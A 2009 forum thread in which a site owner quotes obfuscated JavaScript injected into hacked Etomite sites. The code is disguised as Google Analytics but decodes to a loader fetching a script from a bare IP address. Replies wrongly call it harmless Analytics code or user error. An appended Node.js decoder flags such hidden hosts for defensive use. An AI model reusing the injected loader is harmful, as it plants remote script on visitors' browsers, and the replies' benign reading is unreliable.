I've got two sites running etomite (v1.1 and one from July 2008) that recently got hacked. Etomite is the only thing they have in common. Something goes through and tries to add the following to all the index.php files it can find as well as adds new index.html files that say something like 'nothing to see here'. Only problem is it doesn't parse and breaks the site.
It appears to try to add some Google Analytics code:
<?php echo '<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?>
This may not be etomite. One site has wordpress installed which may be the issue.
Does this sound familiar to anybody? I googled UA-7623457-2 and found other people with a similar issue, but no one knew what it was yet.
Etomite exploit of some kind?
Started by DropDeadFred, Jun 23 2009 09:27 PM
3 replies to this topic
#1
Posted 23 June 2009 - 09:27 PM
#2
Posted 23 June 2009 - 09:30 PM
That script there is Google Analytics code (site stats).
Nothing to see here files are meant to be in the assets folder (and recursive folders).
There aren't any known exploits for etomite - it could be something at server level though..
#3
Posted 24 June 2009 - 12:00 AM
DeanC, on Jun 23 2009, 03:30 PM, said:
That script there is Google Analytics code (site stats).
Nothing to see here files are meant to be in the assets folder (and recursive folders).
There aren't any known exploits for etomite - it could be something at server level though..
Thanks, I'll keep checking. It's that 'known' issue that I'm worried about at this point.
#4
Posted 29 June 2009 - 08:53 PM
Hi there
Have you tried checking in the manager of the file to see that it shouldn't be rich text?
Perhaps the end user or client has pasted that right into the WYSIWYG editor, without turning on the HTML source toggle button first.
I always advise that these chunks of script are inserted directly into the template, or called via a chunk.
Not sure if what I'm answering is the solution to this or not, but hope it's helpful, anyway.
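An added example, not part of any post in this thread: a Node.js sketch that statically decodes the `'...'.replace(/.../, '')` expression in the snippet from the first post and lists any script hosts it yields other than google-analytics.com. SAMPLE is the document.write line copied from that post; the function names and the allowlist are assumptions made for the illustration.

```javascript
// Added example: statically decode string literals that are "cleaned" with
// .replace(/junk-chars/, '') before being written into a <script> tag.
// Nothing from the sample is evaluated; it is only treated as text.

// The document.write line from the first post, copied verbatim.
const SAMPLE = String.raw`document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));`;

// Matches  '<literal>'.replace(/<pattern>/<flags>, '')
const STRIP_CALL =
  /'((?:\\.|[^'\\])*)'\.replace\(\/((?:\\.|[^\/\\])+)\/([a-z]*),\s*(?:''|"")\)/g;

// Hypothetical helper: return each literal with its strip pattern applied.
function decodeStrippedLiterals(source) {
  const decoded = [];
  for (const [, literal, pattern, flags] of source.matchAll(STRIP_CALL)) {
    let strip;
    try {
      strip = new RegExp(pattern, flags);
    } catch (e) {
      continue; // pattern or flags are not a valid regex; skip this call
    }
    // Undo simple backslash escapes such as \' inside the literal.
    const text = literal.replace(/\\(.)/g, '$1');
    decoded.push(text.replace(strip, ''));
  }
  return decoded;
}

// Assumption: the only host a genuine Analytics loader should reference.
const EXPECTED = ['google-analytics.com'];

// Hypothetical helper: hosts found in decoded literals that are not expected.
function unexpectedHosts(source, expected = EXPECTED) {
  const hosts = new Set();
  for (const text of decodeStrippedLiterals(source)) {
    for (const [, host] of text.matchAll(/https?:\/\/([^\/'"\s]+)/gi)) {
      const h = host.toLowerCase();
      const ok = expected.some((d) => h === d || h.endsWith('.' + d));
      if (!ok) hosts.add(h);
    }
  }
  return [...hosts];
}

console.log(decodeStrippedLiterals(SAMPLE));
console.log(unexpectedHosts(SAMPLE));
```

The same two functions can be run over the contents of each index.php under a webroot to list files that carry this kind of hidden second `src` attribute.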